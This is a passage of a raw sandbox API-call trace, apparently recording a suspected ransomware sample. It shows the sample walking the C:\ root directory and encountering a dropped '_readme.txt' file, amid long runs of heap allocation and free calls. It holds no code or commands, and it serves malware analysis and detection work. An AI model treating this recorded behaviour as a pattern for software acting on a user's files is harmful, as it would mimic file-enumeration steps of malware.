ftLastWriteTime.dwLowDateTime=0x1434c8c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0187.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0187.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2c73318 [0187.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96f0 [0187.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0187.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0187.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0187.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f48 | out: hHeap=0x620000) returned 1 [0187.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0187.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0187.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0187.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.790] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1f2b3de0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1f2b3de0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0187.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0187.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f48 [0187.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f48 | out: hHeap=0x620000) returned 1 [0187.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0187.791] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7844bbf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x78471d50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x78471d50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0187.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0187.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f48 [0187.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f48 | out: hHeap=0x620000) returned 1 [0187.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0187.792] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xa3740380, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xbd8bb9c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbd8bb9c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x2c7a838 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f48 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83ef8 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a98 [0187.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0187.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96f0 | out: hHeap=0x620000) returned 1 [0187.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0187.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0187.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f20 | out: hHeap=0x620000) returned 1 [0187.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0187.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddee8 | out: hHeap=0x620000) returned 1 [0187.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde10 | out: hHeap=0x620000) returned 1 [0187.795] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x98a68680, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0x98a68680, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0x98a68680, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0187.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0187.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f20 | out: hHeap=0x620000) returned 1 [0187.795] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0187.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0187.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f20 | out: hHeap=0x620000) returned 1 [0187.796] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9f317170, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9f317170, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0187.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f20 | out: hHeap=0x620000) returned 1 [0187.797] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xd95731c0, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0xd95731c0, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xd95731c0, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0187.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.797] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0187.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f20 | out: hHeap=0x620000) returned 1 [0187.797] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xd95731c0, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0xd95731c0, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xd95731c0, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0187.797] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0187.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9680 [0187.798] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0187.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9760 [0187.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9760 | out: hHeap=0x620000) returned 1 [0187.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0187.810] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0187.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f20 [0187.810] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0187.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0187.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0187.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0187.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0187.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0187.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0187.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f70 [0187.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0187.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0187.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 